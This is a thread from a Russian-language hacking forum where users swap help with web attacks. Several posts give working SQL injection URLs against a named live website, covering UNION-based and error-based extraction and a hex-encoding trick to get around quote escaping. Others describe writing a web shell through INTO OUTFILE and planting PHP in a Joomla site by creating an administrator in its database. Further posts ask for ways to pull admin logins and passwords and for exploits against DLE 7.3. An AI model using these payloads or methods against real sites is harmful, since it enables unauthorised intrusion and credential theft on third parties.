HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #341  
Старый 16.12.2011, 14:55
infoseller
Guest
Сообщений: n/a
Провел на форуме:
49472

Репутация: 0
По умолчанию

Нашел слепую скулю в cms Nautilus, делать полный дамп - долго, муторно и не нужно. Подскажите, в какой таблице лежат логины и пассы... поиск ничего не дал
 
Ответить с цитированием

  #342  
Старый 11.01.2012, 06:26
dumpers_team
Guest
Сообщений: n/a
Провел на форуме:
5209

Репутация: 0
По умолчанию

Доброго всем дня, движок стоит interspire shopping cart, каким образом можно определить версию, которая установленна в данный момент?
 
Ответить с цитированием

  #343  
Старый 13.01.2012, 06:01
dumpers_team
Guest
Сообщений: n/a
Провел на форуме:
5209

Репутация: 0
По умолчанию

Цитата:
Сообщение от S-J  
S-J said:
Подскажите как можно вставить сторонний PHP код в джумлу имея ФТП с полными правами + доступ к БД..
пробовал через БД в модули сунуть но отображается просто как текст а не как пхп код...
с инклудами в пхп файлы тоже не получается, ошибки выдает после инклуда, наверное не правильно инклуд делаю хотя тут хз, если можно как то инклудить то подскажите правильный инклуд в файлы.
Создай себе админа в бд, зайди в админку, и установи модуль mod_php, он всё выводить должен.

Если будет резать код при сохранении, просто зайди в настройку пользователей, выбери своего пользователя, и отключи редактор.
 
Ответить с цитированием

  #344  
Старый 14.01.2012, 13:52
muljtik
Guest
Сообщений: n/a
Провел на форуме:
3622

Репутация: 0
По умолчанию

подскажите в чём дело.. Ситуация такая, сделав запрос такого вида

_http://www.witchcraft.nu/newsitem.php?id=-362+union+select+1,2,table_name,4,5,6,7,8,9,10,11% 20from%20information_schema.tables%20limit%2029,1--

я получаю название таблицы "usedboard", теперь хочу прочитать содержание этой таблицы, делаю запрос такого вида

_http://www.witchcraft.nu/newsitem.php?id=-362+union+select+1,2,column_name,4,5,6,7,8,9,10,11 from information_schema.columns where table_name='usedboard' LIMIT 1,1 --

поидеи как я читал этот запрос должен мне показать содерживое таблицы "usedboard", но вместо этого он мне выкидывает ошибку "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'usedboard\' LIMIT 1,1 --' at line 1"

такая проблема не только с этим пациентам, с десяток разных сайтов перепробовал неполучается прочитать и ошибки не везде одинаковые пишет.

P.S. только начинаю осваивать данное дело, тапками не кидаться
 
Ответить с цитированием

  #345  
Старый 14.01.2012, 14:01
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от muljtik  
muljtik said:
P.S. только начинаю осваивать данное дело, тапками не кидаться
Возможно в другой БД твоя таблица, подбери так:

Код:
Code:
http://www.witchcraft.nu/newsitem.php?id=-362+and(select+1+from(select+count(*),concat((select+concat(table_schema,0x2e,table_name,0x00)+from+information_schema.columns+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
Потом from+db.table
 
Ответить с цитированием

  #346  
Старый 14.01.2012, 14:20
muljtik
Guest
Сообщений: n/a
Провел на форуме:
3622

Репутация: 0
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
Возможно в другой БД твоя таблица, подбери так:
Код:
Code:
http://www.witchcraft.nu/newsitem.php?id=-362+and(select+1+from(select+count(*),concat((select+concat(table_schema,0x2e,table_name,0x00)+from+information_schema.columns+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
Потом from+db.table
Ну ты грузанул канеш.. ничего не понял с твоего запроса, я пока что на стадии изучения -5+union+select+1,..., а так мои запросы правельные? я думаю может в них я что то не правильно пишу, спасибо за помощь, а ещё буду благодарен за мануал где используются запросы твоего вида

------------------------

Наугад переберал запросы вида

http://www.witchcraft.nu/newsitem.php?id=-362+union+select+1,2,id,4,5,6,7,8,9,10,11+from+use dboard+limit+1,1--

пытался найти мне нужное поле, попал только на одно существующие "ID", все не правельные выводились ошибкой "Unknown column 'login' in 'field list'", так почему же у меня неполучается прочитать какие поля существуют в usedboard
 
Ответить с цитированием

  #347  
Старый 14.01.2012, 14:32
trololoman96
Guest
Сообщений: n/a
Провел на форуме:
29020

Репутация: 55
По умолчанию

Цитата:
Сообщение от None  
Ну ты грузанул канеш.. ничего не понял с твоего запроса, я пока что на стадии изучения -5+union+select+1,..., а так мои запросы правельные? я думаю может в них я что то не правильно пишу, спасибо за помощь, а ещё буду благодарен за мануал где используются запросы твоего вида
почти правильный, у тебя там на сайте magic_quotes_gpc = on поэтому нужно избегать ковычки, нужно хексить имя таблицы, т.е. сейчас у тебя так:

... where table_name='usedboard' LIMIT 1,1 --

а нужно

... where table_name=0x75736564626f617264 LIMIT 1,1 --

в мане все есть, тем более ошибка сама намекает на проблему

зы предугадывая ход твоих мыслей, онлайн декодировщик в хекс http://www.string-functions.com/string-hex.aspx

зыы по поводу запроса от Ereee, это error based техника, ман по ней гуглится легко, но лучше начни с основ.
 
Ответить с цитированием

  #348  
Старый 14.01.2012, 15:38
muljtik
Guest
Сообщений: n/a
Провел на форуме:
3622

Репутация: 0
По умолчанию

спасибо за помощь, с этим разобрался, бывает такое что в бд нет логина и пароля админа, врятли да? хренова искал походу..

trololoman96 я согласен с вами что в мануале всё есть, но найти это тоже не просто, даже через поиск

прочитал что если команда user() выдаёт значение username@localhost, то получается есть возможность залить шелл локально, нашёл вот такую команду "UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php'; --" как понял к 1.php надо подставить путь который можно узнать в phpinfo на сервере пациента, но что делать с этим куском кода ''?

ещё путает один нюанс, тоже всё с мануалов путает немного, дело в том что все начинают делать запросы по разному вот несколько примеров

-362+union+select+1,...

362+union+select+1,...

362+and(1=2)+union+select+1,...

null+union+select+1,...

так же в конце запроса видел разную концовку ( -- /* ), играет это какую нибудь роль? если да ткните носом в мануал где это расписано для усвоения материала
 
Ответить с цитированием

  #349  
Старый 14.01.2012, 20:43
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от muljtik  
muljtik said:
спасибо за помощь, с этим разобрался, бывает такое что в бд нет логина и пароля админа, врятли да? хренова искал походу..
trololoman96
я согласен с вами что в мануале всё есть, но найти это тоже не просто, даже через поиск
прочитал что если команда user() выдаёт значение username@localhost, то получается есть возможность залить шелл локально, нашёл вот такую команду "UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php'; --" как понял к 1.php надо подставить путь который можно узнать в phpinfo на сервере пациента, но что делать с этим куском кода ''?
ещё путает один нюанс, тоже всё с мануалов путает немного, дело в том что все начинают делать запросы по разному вот несколько примеров
-362+union+select+1,...
362+union+select+1,...
362+and(1=2)+union+select+1,...
null+union+select+1,...
так же в конце запроса видел разную концовку ( -- /* ), играет это какую нибудь роль? если да ткните носом в мануал где это расписано для усвоения материала
/thread43966.html
 
Ответить с цитированием

  #350  
Старый 15.01.2012, 10:58
coka-cola
Guest
Сообщений: n/a
Провел на форуме:
761

Репутация: 0
По умолчанию

Ребят подскажите sql иньекции для dle 7.3 дабы она старая думаю вас незатруднит)

ну или фак по взлому мож кто кинут с меня +!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Уязвимости CMS / форумов 316 08.06.2010 09:56
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ